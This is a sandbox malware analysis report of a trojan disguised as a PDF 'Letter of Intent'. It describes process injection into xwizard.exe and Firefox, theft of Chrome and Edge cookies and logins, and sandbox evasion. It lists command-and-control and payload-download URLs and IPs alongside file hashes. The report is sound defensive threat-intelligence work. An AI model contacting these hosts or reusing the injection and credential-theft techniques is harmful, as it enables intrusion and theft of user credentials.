            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FC5734 mov eax, dword ptr fs:[00000030h]2_2_32FC5734
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_330516CC mov eax, dword ptr fs:[00000030h]2_2_330516CC
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32F93720 mov eax, dword ptr fs:[00000030h]2_2_32F93720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FAF720 mov eax, dword ptr fs:[00000030h]2_2_32FAF720
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FCF71F mov eax, dword ptr fs:[00000030h]2_2_32FCF71F

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | Section loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | Section loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Thread register set: target process: 4996
            Source: C:\Windows\SysWOW64\xwizard.exe | Thread APC queued: target process: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | Process created: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe "C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
            Source: C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: ybjXXpYwhPHZD.exe, 00000005.00000000.2269287021.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000005.00000002.3107665202.0000000001170000.00000002.00000001.00040000.00000000.sdmp, ybjXXpYwhPHZD.exe, 00000007.00000000.2419381651.0000000001250000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | Code function: 0_2_00405D68 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\xwizard.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 312 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Abuse Elevation Control Mechanism | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 24 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

            [Behavior graph: ID 1550554, Sample: Letter of Intent (LOI) For ..., Start date: 06/11/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | 42% | ReversingLabs | Win32.Trojan.Guloader |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nsc7BA1.tmp\System.dll | 0% | ReversingLabs | |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            http://www.astrext.info/8u3q/ | 0% | Avira URL Cloud | safe |
            http://www.regents.health/q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= | 0% | Avira URL Cloud | safe |
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binH | 0% | Avira URL Cloud | safe |
            http://www.73613.shop/tizt/ | 0% | Avira URL Cloud | safe |
            http://www.eco-tops.website/n54u/ | 0% | Avira URL Cloud | safe |
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin6 | 0% | Avira URL Cloud | safe |
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin | 0% | Avira URL Cloud | safe |
            http://www.newhopetoday.app | 0% | Avira URL Cloud | safe |
            https://www.evolutioncosmetics.com/ | 0% | Avira URL Cloud | safe |
            http://www.newhopetoday.app/f83s/ | 0% | Avira URL Cloud | safe |
            http://www.73613.shop/tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe | 0% | Avira URL Cloud | safe |

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            evolutioncosmetics.com | 69.27.100.185 | true | false | | unknown
            www.newhopetoday.app | 216.40.34.41 | true | true | | unknown
            www.73613.shop | 180.178.39.235 | true | true | | unknown
            www.astrext.info | 217.160.0.132 | true | true | | unknown
            regents.health | 3.33.130.190 | true | true | | unknown
            www.eco-tops.website | 203.161.49.193 | true | true | | unknown
            www.regents.health | unknown | unknown | false | | unknown
            www.evolutioncosmetics.com | unknown | unknown | false | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin | false | Avira URL Cloud: safe | unknown
            http://www.eco-tops.website/n54u/ | true | Avira URL Cloud: safe | unknown
            http://www.73613.shop/tizt/ | true | Avira URL Cloud: safe | unknown
            http://www.regents.health/q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= | true | Avira URL Cloud: safe | unknown
            http://www.newhopetoday.app/f83s/ | true | Avira URL Cloud: safe | unknown
            http://www.astrext.info/8u3q/ | true | Avira URL Cloud: safe | unknown
            http://www.73613.shop/tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe | true | Avira URL Cloud: safe | unknown

            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            217.160.0.132 | www.astrext.info | Germany | | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
            203.161.49.193 | www.eco-tops.website | Malaysia | | 45899 | VNPT-AS-VNVNPTCorpVN | true
            180.178.39.235 | www.73613.shop | Hong Kong | | 45753 | NETSEC-HKNETSECHK | true
            69.27.100.185 | evolutioncosmetics.com | Canada | | 55017 | VDCCA | false
            3.33.130.190 | regents.health | United States | | 8987 | AMAZONEXPANSIONGB | true
            216.40.34.41 | www.newhopetoday.app | Canada | | 15348 | TUCOWSCA | true

            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1550554
            Start date and time: 2024-11-06 20:31:06 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 9m 5s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 8
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@7/14@6/6
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 92%
                                                      • Number of executed functions: 113
                                                      • Number of non-executed functions: 321
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target ybjXXpYwhPHZD.exe, PID 5548 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
Time | Type | Description
14:33:44 | API Interceptor | 626370x Sleep call for process: xwizard.exe modified
                                                                                    Process:C:\Windows\SysWOW64\xwizard.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):45
                                                                                    Entropy (8bit):4.7748605961854445
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                                                    MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                                                    SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                                                    SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                                                    SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                                                    Process:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11264
                                                                                    Entropy (8bit):5.774411073650885
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:eB2HS+ihg200uWz947Wzvxu6v0MI7JOde+Ij5Z77dslFsE+:3S62Gw947ExuGDI7J8EF7KIE
                                                                                    MD5:BE2621A78A13A56CF09E00DD98488360
                                                                                    SHA1:75F0539DC6AF200A07CDB056CDDDDEC595C6CFD2
                                                                                    SHA-256:852047023BA0CAE91C7A43365878613CFB4E64E36FF98C460E113D5088D68EF5
                                                                                    SHA-512:B80CF1F678E6885276B9A1BFD9227374B2EB9E38BB20446D52EBE2C3DBA89764AA50CB4D49DF51A974478F3364B5DBCBC5B4A16DC8F1123B40C89C01725BE3D1
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
• Filename: Quotation.exe, Detection: malicious
• Filename: Quotation.exe, Detection: malicious
• Filename: REQUEST FOR QUOTATION.exe, Detection: malicious
• Filename: REQUEST FOR QUOTATION.exe, Detection: malicious
• Filename: Request for Quotation.exe, Detection: malicious
• Filename: Request for Quotation.exe, Detection: malicious
